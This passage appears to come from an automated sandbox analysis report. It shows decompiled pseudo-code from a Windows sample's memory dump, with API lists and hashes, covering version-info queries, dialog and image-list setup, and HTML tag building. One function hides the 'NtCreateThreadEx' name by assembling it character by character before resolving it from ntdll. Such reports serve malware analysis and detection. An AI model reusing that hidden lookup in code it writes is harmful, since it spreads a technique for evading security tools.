						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

















                                                                                                                                                                                                                          0x0040b04d
                                                                                                                                                                                                                          0x0040b05e
                                                                                                                                                                                                                          0x0040b060
                                                                                                                                                                                                                          0x0040b063
                                                                                                                                                                                                                          0x0040b06a
                                                                                                                                                                                                                          0x0040b06d
                                                                                                                                                                                                                          0x0040b076
                                                                                                                                                                                                                          0x0040b07b
                                                                                                                                                                                                                          0x0040b07e
                                                                                                                                                                                                                          0x0040b084
                                                                                                                                                                                                                          0x0040b08e
                                                                                                                                                                                                                          0x0040b0a8
                                                                                                                                                                                                                          0x0040b0aa
                                                                                                                                                                                                                          0x0040b0ad
                                                                                                                                                                                                                          0x0040b0b0
                                                                                                                                                                                                                          0x0040b0b3
                                                                                                                                                                                                                          0x0040b0b6
                                                                                                                                                                                                                          0x0040b0b8
                                                                                                                                                                                                                          0x0040b0bb
                                                                                                                                                                                                                          0x0040b0be
                                                                                                                                                                                                                          0x0040b0c1
                                                                                                                                                                                                                          0x0040b0c4
                                                                                                                                                                                                                          0x0040b0c7
                                                                                                                                                                                                                          0x0040b0ca
                                                                                                                                                                                                                          0x0040b0cd
                                                                                                                                                                                                                          0x0040b0cd
                                                                                                                                                                                                                          0x0040b0e5
                                                                                                                                                                                                                          0x0040b11f
                                                                                                                                                                                                                          0x0040b128
                                                                                                                                                                                                                          0x0040b0e7
                                                                                                                                                                                                                          0x0040b0e7
                                                                                                                                                                                                                          0x0040b0f1
                                                                                                                                                                                                                          0x0040b0f2
                                                                                                                                                                                                                          0x0040b0f3
                                                                                                                                                                                                                          0x0040b0fb
                                                                                                                                                                                                                          0x0040b0fd
                                                                                                                                                                                                                          0x0040b0fe
                                                                                                                                                                                                                          0x0040b11d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040b11d
                                                                                                                                                                                                                          0x0040b13c
                                                                                                                                                                                                                          0x0040b151
                                                                                                                                                                                                                          0x0040b166
                                                                                                                                                                                                                          0x0040b17b
                                                                                                                                                                                                                          0x0040b190
                                                                                                                                                                                                                          0x0040b1a5
                                                                                                                                                                                                                          0x0040b1ba
                                                                                                                                                                                                                          0x0040b1cf
                                                                                                                                                                                                                          0x0040b1d6
                                                                                                                                                                                                                          0x0040b1d7
                                                                                                                                                                                                                          0x0040b1d8
                                                                                                                                                                                                                          0x0040b1de
                                                                                                                                                                                                                          0x0040b1e3

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                                                                                                                          • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                                                                                                                          • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                                                                                                                          • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040B128
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                                                                                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                          • API String ID: 1223191525-1542517562
                                                                                                                                                                                                                          • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                                                                                                                          • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                                                          			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}





















                                                                                                                                                                                                                          0x0040a1f8
                                                                                                                                                                                                                          0x0040a26d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040a26f
                                                                                                                                                                                                                          0x0040a205
                                                                                                                                                                                                                          0x0040a20b
                                                                                                                                                                                                                          0x0040a20d
                                                                                                                                                                                                                          0x0040a213
                                                                                                                                                                                                                          0x0040a214
                                                                                                                                                                                                                          0x0040a215
                                                                                                                                                                                                                          0x0040a216
                                                                                                                                                                                                                          0x0040a217
                                                                                                                                                                                                                          0x0040a219
                                                                                                                                                                                                                          0x0040a21f
                                                                                                                                                                                                                          0x0040a223
                                                                                                                                                                                                                          0x0040a227
                                                                                                                                                                                                                          0x0040a22b
                                                                                                                                                                                                                          0x0040a22f
                                                                                                                                                                                                                          0x0040a233
                                                                                                                                                                                                                          0x0040a237
                                                                                                                                                                                                                          0x0040a23b
                                                                                                                                                                                                                          0x0040a23f
                                                                                                                                                                                                                          0x0040a243
                                                                                                                                                                                                                          0x0040a247
                                                                                                                                                                                                                          0x0040a24b
                                                                                                                                                                                                                          0x0040a24f
                                                                                                                                                                                                                          0x0040a253
                                                                                                                                                                                                                          0x0040a257
                                                                                                                                                                                                                          0x0040a25b
                                                                                                                                                                                                                          0x0040a25f
                                                                                                                                                                                                                          0x0040a269
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040a26c
                                                                                                                                                                                                                          0x0040a271

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                          • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                                                                                                                                          • API String ID: 2574300362-1257427173
                                                                                                                                                                                                                          • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                                                                                                                          • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 63%
                                                                                                                                                                                                                          			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}


















                                                                                                                                                                                                                          0x00407f9b
                                                                                                                                                                                                                          0x00407fa3
                                                                                                                                                                                                                          0x00407fad
                                                                                                                                                                                                                          0x00407fb9
                                                                                                                                                                                                                          0x0040802e
                                                                                                                                                                                                                          0x00408032
                                                                                                                                                                                                                          0x00408038
                                                                                                                                                                                                                          0x0040803e
                                                                                                                                                                                                                          0x00407fbb
                                                                                                                                                                                                                          0x00407fc9
                                                                                                                                                                                                                          0x00407fd0
                                                                                                                                                                                                                          0x00407fe0
                                                                                                                                                                                                                          0x00407fe5
                                                                                                                                                                                                                          0x00407ff7
                                                                                                                                                                                                                          0x00408015
                                                                                                                                                                                                                          0x0040801b
                                                                                                                                                                                                                          0x00408021
                                                                                                                                                                                                                          0x00408021
                                                                                                                                                                                                                          0x00408051
                                                                                                                                                                                                                          0x00408051
                                                                                                                                                                                                                          0x00408059
                                                                                                                                                                                                                          0x00408065
                                                                                                                                                                                                                          0x00408069
                                                                                                                                                                                                                          0x0040806f
                                                                                                                                                                                                                          0x00408087
                                                                                                                                                                                                                          0x00408087
                                                                                                                                                                                                                          0x0040809c
                                                                                                                                                                                                                          0x004080bb
                                                                                                                                                                                                                          0x004080d1
                                                                                                                                                                                                                          0x004080de
                                                                                                                                                                                                                          0x004080e2
                                                                                                                                                                                                                          0x004080ea
                                                                                                                                                                                                                          0x004080fb
                                                                                                                                                                                                                          0x00408105
                                                                                                                                                                                                                          0x00408115
                                                                                                                                                                                                                          0x00408121
                                                                                                                                                                                                                          0x00408127
                                                                                                                                                                                                                          0x00408150

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407FD0
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407FE5
                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                                                                                                                                          • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                                                                                                                                          • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                                                                                                                                          • LoadImageW.USER32 ref: 004080B4
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                                                                                                                                          • LoadImageW.USER32 ref: 004080D1
                                                                                                                                                                                                                          • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00408121
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00408127
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 304928396-0
                                                                                                                                                                                                                          • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                                                                                                                          • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                                                                          			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}













                                                                                                                                                                                                                          0x0040ae90
                                                                                                                                                                                                                          0x0040aeab
                                                                                                                                                                                                                          0x0040aeb2
                                                                                                                                                                                                                          0x0040aec0
                                                                                                                                                                                                                          0x0040aec7
                                                                                                                                                                                                                          0x0040aecc
                                                                                                                                                                                                                          0x0040aed3
                                                                                                                                                                                                                          0x0040aeda
                                                                                                                                                                                                                          0x0040aee1
                                                                                                                                                                                                                          0x0040aee1
                                                                                                                                                                                                                          0x0040aee7
                                                                                                                                                                                                                          0x0040aeea
                                                                                                                                                                                                                          0x0040aeed
                                                                                                                                                                                                                          0x0040aef9
                                                                                                                                                                                                                          0x0040aefe
                                                                                                                                                                                                                          0x0040af05
                                                                                                                                                                                                                          0x0040af07
                                                                                                                                                                                                                          0x0040af08
                                                                                                                                                                                                                          0x0040af13
                                                                                                                                                                                                                          0x0040af18
                                                                                                                                                                                                                          0x0040af19
                                                                                                                                                                                                                          0x0040af26
                                                                                                                                                                                                                          0x0040af2b
                                                                                                                                                                                                                          0x0040af2b
                                                                                                                                                                                                                          0x0040af2e
                                                                                                                                                                                                                          0x0040af34
                                                                                                                                                                                                                          0x0040af43
                                                                                                                                                                                                                          0x0040af44
                                                                                                                                                                                                                          0x0040af4f
                                                                                                                                                                                                                          0x0040af54
                                                                                                                                                                                                                          0x0040af55
                                                                                                                                                                                                                          0x0040af62
                                                                                                                                                                                                                          0x0040af67
                                                                                                                                                                                                                          0x0040af70
                                                                                                                                                                                                                          0x0040af76
                                                                                                                                                                                                                          0x0040af7a
                                                                                                                                                                                                                          0x0040af82
                                                                                                                                                                                                                          0x0040af88
                                                                                                                                                                                                                          0x0040af8d
                                                                                                                                                                                                                          0x0040af97
                                                                                                                                                                                                                          0x0040af9f
                                                                                                                                                                                                                          0x0040afa5
                                                                                                                                                                                                                          0x0040afa9
                                                                                                                                                                                                                          0x0040afb1
                                                                                                                                                                                                                          0x0040afb7
                                                                                                                                                                                                                          0x0040afbd

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                          • API String ID: 3143752011-1996832678
                                                                                                                                                                                                                          • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                                                                                                                          • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                                                          			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}
















                                                                                                                                                                                                                          0x00403c09
                                                                                                                                                                                                                          0x00403c0c
                                                                                                                                                                                                                          0x00403c11
                                                                                                                                                                                                                          0x00403c1b
                                                                                                                                                                                                                          0x00403c3f
                                                                                                                                                                                                                          0x00403c4a
                                                                                                                                                                                                                          0x00403c6e
                                                                                                                                                                                                                          0x00403c96
                                                                                                                                                                                                                          0x00403c9a
                                                                                                                                                                                                                          0x00403ca6
                                                                                                                                                                                                                          0x00403cb3
                                                                                                                                                                                                                          0x00403cb8
                                                                                                                                                                                                                          0x00403cc5
                                                                                                                                                                                                                          0x00403cca
                                                                                                                                                                                                                          0x00403cdd
                                                                                                                                                                                                                          0x00403ce6
                                                                                                                                                                                                                          0x00403cf8
                                                                                                                                                                                                                          0x00403d11
                                                                                                                                                                                                                          0x00403d26
                                                                                                                                                                                                                          0x00403d3f
                                                                                                                                                                                                                          0x00403d54
                                                                                                                                                                                                                          0x00403d6d
                                                                                                                                                                                                                          0x00403d76
                                                                                                                                                                                                                          0x00403d88
                                                                                                                                                                                                                          0x00403d9e
                                                                                                                                                                                                                          0x00403db0
                                                                                                                                                                                                                          0x00403db5
                                                                                                                                                                                                                          0x00403dc4
                                                                                                                                                                                                                          0x00403dc8
                                                                                                                                                                                                                          0x00403dc9
                                                                                                                                                                                                                          0x00403dca
                                                                                                                                                                                                                          0x00403dda
                                                                                                                                                                                                                          0x00403ddf
                                                                                                                                                                                                                          0x00403de2
                                                                                                                                                                                                                          0x00403de3
                                                                                                                                                                                                                          0x00403df4
                                                                                                                                                                                                                          0x00403df8
                                                                                                                                                                                                                          0x00403df9
                                                                                                                                                                                                                          0x00403dfa
